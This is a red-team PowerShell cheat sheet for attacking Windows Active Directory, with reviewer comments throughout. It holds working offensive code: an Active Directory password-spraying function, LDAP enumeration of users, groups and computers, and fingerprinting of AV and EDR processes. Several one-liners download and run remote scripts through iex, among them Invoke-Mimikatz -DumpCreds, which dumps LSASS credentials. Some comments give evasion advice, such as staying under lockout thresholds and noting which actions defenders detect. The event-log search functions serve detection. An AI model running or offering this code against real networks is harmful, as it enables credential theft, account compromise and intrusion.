Red Teaming PowerShell (Commands and Coding Methods)
function Run-As {
    <#
    .SYNOPSIS
    Launches $Process as $Username using a plaintext $Password.

    .NOTES
    The password is a plain [string] parameter: it ends up in the PowerShell history,
    in transcripts, and in 4688 events when command-line auditing is on. Prefer a
    PSCredential built with Get-Credential where the calling context allows it.
    Start-Process -Credential relies on the Secondary Logon service and an interactive
    desktop; it may fail from a non-interactive session (e.g. WinRM) — verify on target.
    #>
    param (
        [Parameter(Mandatory = $True)]
        [string]$Username,
        [Parameter(Mandatory = $True)]
        [string]$Password,
        [Parameter(Mandatory = $True)]
        [string]$Process
    )
    PROCESS {
        $SecurePwd  = ConvertTo-SecureString -String $Password -AsPlainText -Force
        $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList @($Username, $SecurePwd)
        Start-Process -FilePath $Process -Credential $Credential
    }
}
function Search-EventForUser {
    <#
    .SYNOPSIS
    Returns the 4624 (successful logon) events whose TargetUserName matches $Username.

    .NOTES
    $Username is a regex (-match), unanchored: "bob" also matches "bobby". Properties[5]
    is TargetUserName in the 4624 EventData layout. Reading the Security log requires
    administrative rights or membership in Event Log Readers. The filter is applied
    client-side after pulling every 4624, so this is slow on busy hosts.
    #>
    param (
        [Parameter(Mandatory = $True)]
        [string]$Username
    )
    PROCESS {
        $LogonEvents = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; ID = 4624 }
        $LogonEvents | Where-Object { $_.Properties[5].Value -match $Username }
    }
}
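function Search-EventForProcess {
    <#
    .SYNOPSIS
    Returns the 4688 (process creation) events whose NewProcessName matches $Process.

    .NOTES
    4688 EventData positions: 4 NewProcessId, 5 NewProcessName, 6 TokenElevationType,
    7 ProcessId (creator), 8 CommandLine (populated only when "Include command line in
    process creation events" is enabled). The original read Properties[6], the
    elevation-type token (%%1936-style), so a process name could never match.
    4688 only exists when "Audit Process Creation" is switched on; $Process is an
    unanchored regex.
    #>
    param (
        [Parameter(Mandatory = $True)]
        [string]$Process
    )
    PROCESS {
        Get-WinEvent -FilterHashtable @{ LogName = 'Security'; ID = 4688 } |
            Where-Object { $_.Properties[5].Value -match $Process }
    }
}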
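function Search-EventForService {
    <#
    .SYNOPSIS
    Returns the 7045 ("a service was installed") events whose ServiceName matches $Service.

    .NOTES
    7045 is written by the Service Control Manager to the System log, not Security —
    the original queried Security and therefore always came back empty. Its EventData is
    (ServiceName, ImagePath, ServiceType, StartType, AccountName), so the name is
    Properties[0]. $Service is an unanchored regex. Useful for spotting PsExec-style
    lateral movement and persistence via new services.
    #>
    param (
        [Parameter(Mandatory = $True)]
        [string]$Service
    )
    PROCESS {
        Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; ID = 7045 } |
            Where-Object { $_.Properties[0].Value -match $Service }
    }
}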
Search-EventForUserAndProcess
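function Search-EventForUserAndProcess {
    <#
    .SYNOPSIS
    Prints the 4624 logon events for $Username whose logon ProcessName matches $Process.

    .NOTES
    4624 EventData positions (Windows 7 / 2008 R2 and later): 5 TargetUserName,
    8 LogonType, 11 WorkstationName, 16 ProcessId, 17 ProcessName, 18 IpAddress.
    The original read 6/8/10/13 (TargetDomainName, LogonType,
    AuthenticationPackageName, TransmittedServices) and compared $Process against the
    logon type, so nothing ever matched. Both parameters are unanchored regexes.
    Reading the Security log requires admin rights or Event Log Readers. Output goes
    to the host (Write-Host) as in the original, so it cannot be captured by callers.
    #>
    param (
        [Parameter(Mandatory = $True)]
        [string]$Username,
        [Parameter(Mandatory = $True)]
        [string]$Process
    )
    PROCESS {
        Get-WinEvent -FilterHashtable @{ LogName = 'Security'; ID = 4624 } |
            Where-Object { $_.Properties[5].Value -match $Username } |
            ForEach-Object {
                $EventID              = $_.Id
                $EventRecordID        = $_.RecordId
                $EventTimeCreated     = $_.TimeCreated
                $EventLogonType       = $_.Properties[8].Value
                $EventWorkstationName = $_.Properties[11].Value
                $EventProcessID       = $_.Properties[16].Value
                $EventProcessName     = $_.Properties[17].Value
                $EventIpAddress       = $_.Properties[18].Value
                if ($EventProcessName -match $Process) {
                    Write-Host "Event ID: $EventID"
                    Write-Host "Event Record ID: $EventRecordID"
                    Write-Host "Event Time Created: $EventTimeCreated"
                    Write-Host "Event Process ID: $EventProcessID"
                    Write-Host "Event Process Name: $EventProcessName"
                    Write-Host "Logon Type: $EventLogonType"
                    Write-Host "Workstation Name: $EventWorkstationName"
                    Write-Host "Source IP: $EventIpAddress"
                }
            }
    }
}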
Search-EventForUser (Mr.Un1k0d3r)
# Mr.Un1k0d3r RingZer0 Team
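function Search-EventForUser {
    <#
    .SYNOPSIS
    Queries the Security log of one host (or every DC) for 4624 events whose
    TargetUserName equals $TargetUser and prints the interesting fields.

    .PARAMETER TargetUser
    Exact TargetUserName (server-side XPath equality — no wildcards, no regex).
    .PARAMETER ComputerName
    Host to query; defaults to the local machine. Ignored when -FindDC is given.
    .PARAMETER FindDC
    Enumerate the current domain's DCs and query each of them.
    .PARAMETER FullMessage
    Print the whole event message instead of the selected lines.
    .PARAMETER Username
    .PARAMETER Password
    Optional explicit credentials for the remote query (plaintext password: it lands
    in history / transcripts).

    .NOTES
    $TargetUser is interpolated into an XPath string literal without escaping; a value
    containing a double quote breaks the query (XPath 1.0 has no escape for it).
    Remote Get-WinEvent uses RPC (TCP 135 + dynamic ports) and needs the "Remote Event
    Log Management" firewall rule plus admin / Event Log Readers on the target.
    $Creds is explicitly reset in BEGIN: the original left it unassigned when no
    username was given, so a $Creds variable from the caller's scope was silently used.
    #>
    param (
        [Parameter(Mandatory = $True, ValueFromPipeline = $true)]
        [string]$TargetUser,
        [Parameter(Mandatory = $False)]
        [string]$ComputerName = (Get-Item env:COMPUTERNAME).Value,
        [Parameter(Mandatory = $False)]
        [switch]$FindDC = $False,
        [Parameter(Mandatory = $False)]
        [switch]$FullMessage = $False,
        [Parameter(Mandatory = $False)]
        [string]$Username,
        [Parameter(Mandatory = $False)]
        [string]$Password
    )
    BEGIN {
        $Creds = $null
        if ($Username -ne '') {
            $SecurePassword = ConvertTo-SecureString $Password -AsPlainText -Force
            $Creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $Username, $SecurePassword
        }
        # Lines of the rendered message worth showing when -FullMessage is not set.
        $InterestingFields = @(
            "Account Name:",
            "Account Domain:",
            "Security ID:",
            "Source Network Address:",
            "Workstation Name:",
            "Process Name:"
        )
    }
    PROCESS {
        [System.Collections.ArrayList]$dcs = @()
        if ($FindDC) {
            Write-Output "[+] Enumerating all the DCs"
            ForEach ($dc in [DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers) {
                Write-Output "[+] DC found: $($dc.Name)"
                $dcs.Add($dc.Name) | Out-Null
            }
        } else {
            $dcs.Add($ComputerName) | Out-Null
        }
        ForEach ($dc in $dcs) {
            ForEach ($item in $TargetUser) {
                Write-Output "[+] Parsing $($dc) Logs looking for $($item)"
                # The query is identical with or without credentials; only the
                # -Credential argument differs, so build the call once and splat it.
                $xmlFilter = "<QueryList><Query Id=`"0`" Path=`"Security`"><Select Path=`"Security`">*[System[(EventID=4624)] and EventData[Data[@Name=`"TargetUserName`"]=`"$($item)`"]]</Select></Query></QueryList>"
                $queryArgs = @{
                    FilterXml    = $xmlFilter
                    ComputerName = $dc
                    ErrorAction  = 'SilentlyContinue'
                }
                if ($Creds) {
                    Write-Output "[*] Remotely authenticated as $($Username)"
                    $queryArgs['Credential'] = $Creds
                }
                $data = Get-WinEvent @queryArgs | Select-Object Message
                if ($data) {
                    ForEach ($entry in $data) {
                        Write-Output "`n[+] Event found"
                        If ($FullMessage) {
                            Write-Output $entry.Message
                        } Else {
                            ForEach ($Line in $entry.Message.Split("`n")) {
                                $Line | Select-String -Pattern $InterestingFields -SimpleMatch
                            }
                        }
                    }
                } else {
                    Write-Output "[-] No event found on $($dc)..."
                }
            }
        }
    }
    END {
        Write-Output "[+] Process completed..."
    }
}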
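function AD-PasswordRestore {
    <#
    .SYNOPSIS
    Resets $Username's password to $Password and re-enables the account (ActiveDirectory module).

    .NOTES
    This is a password RESET (Set-ADAccountPassword -Reset), not a change: it needs
    "Reset password" rights on the object, rewrites pwdLastSet, and records 4724/4738 on
    the DC — make sure it is covered by the engagement's rules before using it to put a
    sprayed account back. The plaintext password is on the command line (history /
    transcripts / 4688 with command-line auditing). $Domain, previously accepted but never
    used, is now passed as -Server so the reset goes to the domain the caller named.
    Success is tracked per cmdlet: $? in END only reflected the last command, so a failed
    reset followed by a successful enable reported success.
    #>
    param (
        [Parameter(Mandatory = $True)]
        [string]$Username,
        [Parameter(Mandatory = $True)]
        [string]$Password,
        [Parameter(Mandatory = $True)]
        [string]$Domain,
        [Parameter(Mandatory = $False)]
        [switch]$NoErrorReport
    )
    BEGIN {
        $ErrorActionPreference = "SilentlyContinue"
        $ResetOk  = $false
        $EnableOk = $false
    }
    PROCESS {
        $PasswordSecure = ConvertTo-SecureString -String $Password -AsPlainText -Force
        Set-ADAccountPassword -Identity $Username -NewPassword $PasswordSecure -Reset -Server $Domain -ErrorAction SilentlyContinue
        $ResetOk = $?   # $? is $false when the cmdlet wrote a (suppressed) non-terminating error
        Set-ADUser -Identity $Username -Enabled $True -Server $Domain -ErrorAction SilentlyContinue
        $EnableOk = $?
    }
    END {
        if (-not $NoErrorReport) {
            if ($ResetOk -and $EnableOk) {
                Write-Output "[+] Password restored successfully..."
            } else {
                Write-Output "[-] Password restore failed..."
            }
        }
    }
}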
Invoke-ADPasswordBruteForce
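function Invoke-ADPasswordBruteForce {
    <#
    .SYNOPSIS
    Resets $Username's password to every line of $PasswordList in turn and re-enables the account.

    .NOTES
    Despite its name this variant does NOT test passwords: every iteration performs a
    Set-ADAccountPassword -Reset, so the account ends up with the LAST entry of the list and
    each reset is logged as 4724 on the DC. For actual guessing use the
    PrincipalContext.ValidateCredentials variant defined later in this file. Kept as-is
    apart from the success tracking: $? in END only reflected the final Set-ADUser, so any
    failed reset in the loop was reported as success.
    #>
    param (
        [Parameter(Mandatory = $True)]
        [string]$Username,
        [Parameter(Mandatory = $True)]
        [string]$PasswordList,
        [Parameter(Mandatory = $False)]
        [switch]$NoErrorReport
    )
    BEGIN {
        $ErrorActionPreference = "SilentlyContinue"
        $AllOk = $true
    }
    PROCESS {
        $PasswordArray = Get-Content $PasswordList
        foreach ($Password in $PasswordArray) {
            $PasswordSecure = ConvertTo-SecureString -String $Password -AsPlainText -Force
            Set-ADAccountPassword -Identity $Username -NewPassword $PasswordSecure -Reset -ErrorAction SilentlyContinue
            if (-not $?) { $AllOk = $false }
            Set-ADUser -Identity $Username -Enabled $True -ErrorAction SilentlyContinue
            if (-not $?) { $AllOk = $false }
        }
    }
    END {
        if (-not $NoErrorReport) {
            if ($AllOk) {
                Write-Output "[+] Password restored successfully..."
            } else {
                Write-Output "[-] Password restore failed..."
            }
        }
    }
}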
Invoke-ADPasswordBruteForce (Mr-Un1k0d3r)
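Function Invoke-ADPasswordBruteForce {
    <#
    .SYNOPSIS
    Password spray: validates one $Password against each $Username via
    PrincipalContext.ValidateCredentials.

    .NOTES
    Every call is a real logon attempt: a failure increments badPwdCount and counts
    toward the domain lockout threshold, and each attempt leaves 4625/4776 on the DC.
    Check Get-ADDefaultDomainPasswordPolicy (and fine-grained policies) first and stay
    well under the threshold per observation window. The banner prints the password in
    clear and will be captured by transcripts. The original called `exit` on a connection
    error, which terminates the whole PowerShell host (and the caller's session); an
    abort flag now stops processing instead. Each PrincipalContext is disposed.
    #>
    param (
        [Parameter(Mandatory = $True, ValueFromPipeline = $true)]
        [string]$Username,
        [Parameter(Mandatory = $True)]
        [string]$Password,
        [Parameter(Mandatory = $False)]
        [string]$Domain = (Get-Item env:USERDOMAIN).Value
    )
    BEGIN {
        Write-Output "[+] Brute forcing users against the ""$($Domain)"" domain using the password ""$($Password)"""
        Add-Type -AssemblyName System.DirectoryServices.AccountManagement
        $Aborted = $false
    }
    PROCESS {
        if ($Aborted) { return }
        ForEach ($User in $Username) {
            $PrincipalContext = $null
            Try {
                $Context = [System.DirectoryServices.AccountManagement.ContextType]::Domain
                $PrincipalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($Context, $Domain)
                If ($PrincipalContext.ValidateCredentials($User, $Password) -eq $True) {
                    Write-Output "[+] $($User) password is $($Password)"
                }
            } Catch {
                Write-Output "[-] Error reaching the server. Aborting"
                $Aborted = $true
                break
            } Finally {
                if ($PrincipalContext) { $PrincipalContext.Dispose() }
            }
        }
    }
    END {
        Write-Output "[+] Process completed..."
    }
}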
# Unfinished stub: PROCESS is empty, so this only prints the two banners and ignores
# $Filter/$Property/$NoErrorReport. A working Ldap-Query (DirectorySearcher-based) is
# defined later in this file and supersedes this one when both are dot-sourced in order.
function Ldap-Query {
param (
[Parameter (Mandatory = $True )]
[string ]$Filter ,
[Parameter (Mandatory = $True )]
[string ]$Property ,
[Parameter (Mandatory = $False )]
[switch ]$NoErrorReport
)
BEGIN {
Write-Output " [+] Starting process..."
}
PROCESS {
# No search is performed here.
}
END {
Write-Output " [+] Process completed..."
}
}
# Unfinished stub: PROCESS is empty, so nothing is queried and no properties are returned.
# The complete Ldap-GetProperty appears later in this file and replaces this definition
# when the file is dot-sourced top to bottom.
function Ldap-GetProperty {
param (
[Parameter (Mandatory = $True , ValueFromPipeline = $True )]
[string ]$Filter ,
[Parameter (Mandatory = $True )]
[string ]$Property ,
[Parameter (Mandatory = $False )]
[switch ]$NoErrorReport
)
BEGIN {
Write-Output " [+] Starting process..."
}
PROCESS {
# No search is performed here.
}
END {
Write-Output " [+] Process completed..."
}
}
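function Ldap-Query {
    <#
    .SYNOPSIS
    Runs an LDAP $Filter against the current domain (default naming context) and emits
    the ResultPropertyCollection of every match.

    .NOTES
    The empty DirectoryEntry binds to the default naming context of the logged-on user's
    domain with the current credentials. $Filter is used verbatim — it is the operator's
    input, but do not feed it untrusted data (LDAP filter injection). PageSize = 100 turns on
    paged results, which sidesteps the server's MaxPageSize (typically 1000 objects).
    SearchResultCollection holds unmanaged handles; FindAll() results must be disposed or
    the process leaks them — the original never did.
    #>
    param (
        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
        [string]$Filter
    )
    BEGIN {
    }
    PROCESS {
        $Root = New-Object System.DirectoryServices.DirectoryEntry
        $Searcher = New-Object System.DirectoryServices.DirectorySearcher
        $Searcher.SearchRoot = $Root
        $Searcher.PageSize = 100
        $Searcher.Filter = $Filter
        $Searcher.SearchScope = "Subtree"
        $Results = $Searcher.FindAll()
        try {
            ForEach ($Item in $Results) {
                Write-Output $Item.Properties
            }
        } finally {
            $Results.Dispose()
            $Searcher.Dispose()
        }
    }
}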
Ldap-GetProperty (Mr-Un1k0d3r)
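function Ldap-GetProperty {
    <#
    .SYNOPSIS
    Runs an LDAP $Filter and returns one PSObject per match carrying the comma-separated
    attributes in $Property (each value flattened to a string).

    .PARAMETER Filter
    LDAP filter, used verbatim (operator input only — no escaping is done).
    .PARAMETER Property
    Comma-separated attribute names, e.g. "name,operatingsystem". Whitespace around
    names is trimmed.
    .PARAMETER NoErrorReport
    Suppress the "[-] Property not found" line for attributes absent on an object.

    .NOTES
    Results are returned once, from END. The original returned $Output from inside
    PROCESS, so with several filters on the pipeline the accumulated array was emitted
    again for every input (duplicates). The missing-attribute check uses
    ResultPropertyCollection.Contains(): an absent attribute yields $null, which
    [string] turns into "" without throwing, so the original Try/Catch never reported
    anything. "[-] Property not found" is still written to the output stream (as before),
    so callers that consume the objects will see those strings mixed in. FindAll()
    results are disposed to avoid leaking unmanaged handles.
    #>
    param (
        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
        [string]$Filter,
        [Parameter(Mandatory = $True)]
        [string]$Property,
        [Parameter(Mandatory = $False)]
        [switch]$NoErrorReport = $False
    )
    BEGIN {
        $Output = @()
        $Attributes = @($Property.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { $_ -ne "" })
    }
    PROCESS {
        $Root = New-Object System.DirectoryServices.DirectoryEntry
        $Searcher = New-Object System.DirectoryServices.DirectorySearcher
        $Searcher.SearchRoot = $Root
        $Searcher.PageSize = 100
        $Searcher.Filter = $Filter
        $Searcher.SearchScope = "Subtree"
        $Results = $Searcher.FindAll()
        try {
            ForEach ($Item in $Results) {
                $Data = $Item.Properties
                $Element = New-Object -TypeName PSObject
                ForEach ($Attribute in $Attributes) {
                    if ($Data.Contains($Attribute)) {
                        # [string] on a ResultPropertyValueCollection joins multi-valued attributes with a space.
                        $Element | Add-Member -MemberType NoteProperty -Name $Attribute -Value ([string]$Data[$Attribute]) -Force
                    } else {
                        $Element | Add-Member -MemberType NoteProperty -Name $Attribute -Value "" -Force
                        if (!$NoErrorReport) {
                            Write-Output "[-] Property not found"
                        }
                    }
                }
                $Output += $Element
            }
        } finally {
            $Results.Dispose()
            $Searcher.Dispose()
        }
    }
    END {
        return $Output
    }
}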
LDAP Computers Information
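function Dump-Computer {
    <#
    .SYNOPSIS
    Prints each $ComputerName and emits the LDAP properties of the matching computer object(s).

    .NOTES
    The original draft declared two PROCESS blocks — a parse error, a function may define
    each named block once — and the first one built $Element without ever emitting it. This
    version keeps the parameter and the name echo, and emits the ResultPropertyCollection
    of every match like Ldap-Query does. $ComputerName is interpolated into the filter
    unescaped: LDAP wildcards such as "WS*" work, so never pass untrusted input.
    FindAll() results are disposed.
    #>
    param (
        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
        [string]$ComputerName
    )
    PROCESS {
        ForEach ($Computer in $ComputerName) {
            Write-Output $Computer
            $Root = New-Object System.DirectoryServices.DirectoryEntry
            $Searcher = New-Object System.DirectoryServices.DirectorySearcher
            $Searcher.SearchRoot = $Root
            $Searcher.PageSize = 100
            $Searcher.Filter = "(name=$Computer)"
            $Searcher.SearchScope = "Subtree"
            $Results = $Searcher.FindAll()
            try {
                ForEach ($Item in $Results) {
                    Write-Output $Item.Properties
                }
            } finally {
                $Results.Dispose()
                $Searcher.Dispose()
            }
        }
    }
}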
Dump-Computers (Mr-Un1k0d3r)
function Dump-Computers {
    <#
    .SYNOPSIS
    Lists the name of every computer object in the domain as a wrapped, auto-sized table.

    .NOTES
    Thin wrapper over Ldap-GetProperty; the "&" in the filter is redundant with a single
    clause but harmless. A full computer enumeration is an LDAP query every DC logs; it is
    also noisy against honeytoken computer objects.
    #>
    PROCESS {
        $Computers = Ldap-GetProperty -Filter "(&(objectCategory=Computer))" -Property "name" -NoErrorReport
        $Computers | Format-Table -Wrap -AutoSize
    }
    END {
        Write-Output "[+] Process completed..."
    }
}
LDAP User & Group Information
function Dump-UserGroup {
    <#
    .SYNOPSIS
    Prints the direct group memberships (memberOf) of each user in $UserName.

    .NOTES
    memberOf lists direct memberships only — nested groups and the user's primary group
    (primaryGroupID, usually Domain Users) are not included. $UserName is interpolated
    into the filter unescaped, so wildcards work and untrusted input must not be passed.
    #>
    param (
        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
        [string]$UserName
    )
    BEGIN {
    }
    PROCESS {
        ForEach ($Account in $UserName) {
            Write-Output "Dumping $($Account) Groups"
            Write-Output "-----------------------------------------------"
            $LdapFilter = "(&(objectCategory=User)(samaccountname=$($Account)))"
            Ldap-GetProperty -Filter $LdapFilter -Property memberof | fl
        }
    }
    END {
        Write-Output "[+] Process completed..."
    }
}
function DumpAll-UserInfo {
    <#
    .SYNOPSIS
    Emits every LDAP attribute of each user in $UserName (via Ldap-Query).

    .NOTES
    Only attributes the current account may read are returned (e.g. no unicodePwd).
    $UserName goes into the filter unescaped; operator input only.
    #>
    param (
        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
        [string]$UserName
    )
    BEGIN {
    }
    PROCESS {
        ForEach ($Account in $UserName) {
            Write-Output "Dumping $($Account)"
            Write-Output "-----------------------------------------------"
            $LdapFilter = "(&(objectCategory=User)(samaccountname=$($Account)))"
            Ldap-Query -Filter $LdapFilter
        }
    }
    END {
        Write-Output "[+] Process completed..."
    }
}
Check, Information & Enum
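# Recommend
# NOTE(review): each of these pulls unpinned code from the master branch of a third-party
# repository and pipes it straight into iex — no hash or signature check, so whoever controls
# the repo (or the path) controls your session. Pin to a commit SHA, compare the download to a
# known hash before executing, and verify the paths exist at that commit (several look stale).
# -UseBasicParsing avoids the IE-engine dependency that can make iwr hang in Windows PowerShell
# 5.1 on hosts where Internet Explorer first-run never completed.
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Check-EDR.ps1); Check-EDR
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Check-EDR.ps1); Check-EDR
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Discovery/Check_EDR_Presence.ps1); Invoke-EDRCheck
# Recommend
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Check-AV.ps1); Check-AV
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Check-AV.ps1); Check-AV
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Discovery/Check_AV_Presence.ps1); Invoke-AVCheck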
Get-AVProcesses / Get-McafeeLogs / Get-AVInfo
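function Get-AVInfo {
    <#
    .SYNOPSIS
    Lists the AV products registered with Windows Security Center and decodes their productState.

    .NOTES
    root\SecurityCenter2 exists only on client SKUs; on Windows Server the query returns
    nothing and this function emits no object (the original emitted one with empty fields).
    Several registered products are common (Defender alongside a third-party AV); the original
    collapsed that array into one object with array-valued fields, so one object is now emitted
    per product. The productState lookup table is the commonly circulated one and is kept as
    is; unknown values report "Unknown" and the raw number is included ('Product State') so
    they can be decoded by hand. Get-WmiObject is deprecated in PowerShell 6+ (Get-CimInstance).
    #>
    Write-Verbose "Enumerating installed AV product..."
    $Products = @(Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $env:computername)
    ForEach ($AntiVirusProduct in $Products) {
        switch ([int]$AntiVirusProduct.productState) {
            262144 { $defstatus = "Up to date";  $rtstatus = "Disabled" }
            262160 { $defstatus = "Out of date"; $rtstatus = "Disabled" }
            266240 { $defstatus = "Up to date";  $rtstatus = "Enabled" }
            266256 { $defstatus = "Out of date"; $rtstatus = "Enabled" }
            393216 { $defstatus = "Up to date";  $rtstatus = "Disabled" }
            393232 { $defstatus = "Out of date"; $rtstatus = "Disabled" }
            393488 { $defstatus = "Out of date"; $rtstatus = "Disabled" }
            397312 { $defstatus = "Up to date";  $rtstatus = "Enabled" }
            397328 { $defstatus = "Out of date"; $rtstatus = "Enabled" }
            397584 { $defstatus = "Out of date"; $rtstatus = "Enabled" }
            397568 { $defstatus = "Up to date";  $rtstatus = "Enabled" }
            393472 { $defstatus = "Up to date";  $rtstatus = "Disabled" }
            default { $defstatus = "Unknown";    $rtstatus = "Unknown" }
        }
        $ht = @{}
        $ht.Computername = $env:computername
        $ht.Name = $AntiVirusProduct.displayName
        $ht.'Product GUID' = $AntiVirusProduct.instanceGuid
        $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe
        $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe
        $ht.'Product State' = $AntiVirusProduct.productState
        $ht.'Definition Status' = $defstatus
        $ht.'Real-time Protection Status' = $rtstatus
        New-Object -TypeName PSObject -Property $ht
    }
}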
function Get-McafeeLogs {
    <#
    .SYNOPSIS
    Returns up to 50 McAfee AV (McLogEvent provider) events from the Application log of the last 14 days.

    .NOTES
    Get-WinEvent throws a terminating "No events were found" error when the provider has
    written nothing in the window; that is caught and reported via Write-Verbose, so the
    function is silent by default. Reading the Application log does not require admin rights.
    #>
    Write-Verbose "Enumerating Mcafee AV events..."
    $Since = (Get-Date).AddDays(-14)
    $Provider = "McLogEvent"
    $Query = @{
        LogName      = "Application"
        StartTime    = $Since
        ProviderName = $Provider
    }
    Try {
        Get-WinEvent -FilterHashTable $Query |
            Select-Object -First 50 ID, Providername, DisplayName, TimeCreated, Level, UserID, ProcessID, Message
    }
    Catch {
        Write-Verbose "[-] Error getting McAfee AV event logs! $($Error[0])`n"
    }
}
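function Get-AVProcesses {
    <#
    .SYNOPSIS
    Emits one object (AVProduct, ProcessName, PID) for every running process whose name
    matches a known security-product process.

    .NOTES
    The original hashtable literal repeated several keys (360tray/360safe/360sd/360safebox,
    avgemc, and mcshield/msmpeng/windefend in different casing — hash literal keys are
    case-insensitive). Duplicate keys in a hash literal are a parse error, so the function
    could not even be defined. Duplicates are removed here, keeping the first, more specific
    label; msmpeng is Windows Defender (MsMpEng.exe), the second "McAfee" mapping was wrong.
    Matching is an unanchored regex (-match), as before: short keys such as "cb", "avp" or
    "avg" match any process name containing them and a process can match several keys,
    producing several objects — review hits before acting on them.
    NOTE(review): avguard is normally associated with Avira rather than Avast — confirm.
    #>
    $processes = Get-Process
    $avlookuptable = @{
        mcshield             = "McAfee AV"
        FrameworkService     = "McAfee AV"
        naPrdMgr             = "McAfee AV"
        mctskmgr             = "McAfee"
        mctray               = "McAfee"
        mpftray              = "McAfee"
        msmptray             = "McAfee"
        windefend            = "Windows Defender AV"
        MSASCui              = "Windows Defender AV"
        msmpeng              = "Windows Defender AV"
        msmpsvc              = "Windows Defender AV"
        winvdf               = "Windows Defender"
        WRSA                 = "WebRoot AV"
        savservice           = "Sophos AV"
        TMCCSF               = "Trend Micro AV"
        TmPfw                = "Trend Micro firewall"
        "symantec antivirus" = "Symantec AV"
        ccSvcHst             = "Symantec Endpoint Protection"
        safeweb              = "Symantec"
        symantec             = "Symantec"
        symtray              = "Symantec"
        norton               = "Norton"
        TaniumClient         = "Tanium"
        mbae                 = "MalwareBytes Anti-Exploit"
        parity               = "Bit9 application whitelisting"
        cb                   = "Carbon Black behavioral analysis"
        "bds-vision"         = "BDS Vision behavioral analysis"
        Triumfant            = "Triumfant behavioral analysis"
        CSFalcon             = "CrowdStrike Falcon EDR"
        ossec                = "OSSEC intrusion detection"
        dgagent              = "Verdasys Digital Guardian DLP"
        kvoop                = "Forcepoint and others"
        xagt                 = "FireEye Endpoint Agent"
        "360tray"            = "360tray"
        "360safe"            = "360safe"
        "360sd"              = "360sd"
        "360safebox"         = "360safebox"
        avp                  = "Kaspersky"
        avpui                = "Kaspersky"
        avpmond              = "Kaspersky"
        avpm                 = "Kaspersky"
        avg                  = "AVG"
        avgctrl              = "AVG"
        avgemc               = "AVG"
        avgtray              = "AVG"
        ashdisp              = "Avast"
        ashserv              = "Avast"
        avguard              = "Avast"
        outpost              = "Outpost"
    }
    ForEach ($process in $processes) {
        ForEach ($key in $avlookuptable.Keys) {
            if ($process.ProcessName -match $key) {
                New-Object -TypeName PSObject -Property @{
                    AVProduct   = $avlookuptable.Get_Item($key)
                    ProcessName = $process.ProcessName
                    PID         = $process.Id
                }
            }
        }
    }
}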
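# Recommend
# NOTE(review): unpinned remote code executed via iex — see the supply-chain caveat on the
# Check-EDR/Check-AV lines above: pin a commit SHA, hash-check the download, and verify the
# paths exist at that commit. -UseBasicParsing avoids the IE-engine dependency in PS 5.1.
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Check-Firewall.ps1); Check-Firewall
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Check-Firewall.ps1); Check-Firewall
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Discovery/Check_Firewall_Presence.ps1); Invoke-FirewallCheck
# Recommend
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Check-Persistence.ps1); Check-Persistence
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Check-Persistence.ps1); Check-Persistence
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Discovery/Check_Persistence.ps1); Invoke-PersistenceCheck
# Recommend
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Check-Privileges.ps1); Check-Privileges
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Check-Privileges.ps1); Check-Privileges
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Discovery/Check_Privileges.ps1); Invoke-PrivilegeCheck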
Dump Credentials with Mimikatz
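# Recommend
# NOTE(review): Invoke-Mimikatz -DumpCreds reads LSASS and is the single most detected action
# in this file (AMSI, script-block logging 4104, LSASS-access telemetry from any EDR); it also
# needs local admin / SeDebugPrivilege and fails outright when LSA Protection (RunAsPPL) or
# Credential Guard is enabled. Same unpinned-remote-code caveat as the other iex lines.
# NOTE(review): Empire keeps Invoke-Mimikatz under data/module_source/credentials/, not
# privesc/ — verify the path before relying on this line.
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-Mimikatz.ps1); Invoke-Mimikatz -DumpCreds
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Discovery/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds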
Download a file from the internet
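# -UseBasicParsing skips the IE DOM parser (it can hang in Windows PowerShell 5.1 where IE
# first-run never completed; it is a no-op in PowerShell 6+). Plain HTTP: the payload can be
# swapped in transit — fetch over HTTPS or check a hash after download.
Invoke-WebRequest -Uri "http://example.com/file.exe" -OutFile "C:\path\to\file.exe" -UseBasicParsing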
Download a file using BITS (Background Intelligent Transfer Service)
# BITS download: runs through the BITS service, honours WinHTTP proxy settings and is
# recorded in the Microsoft-Windows-Bits-Client/Operational log (job create/complete).
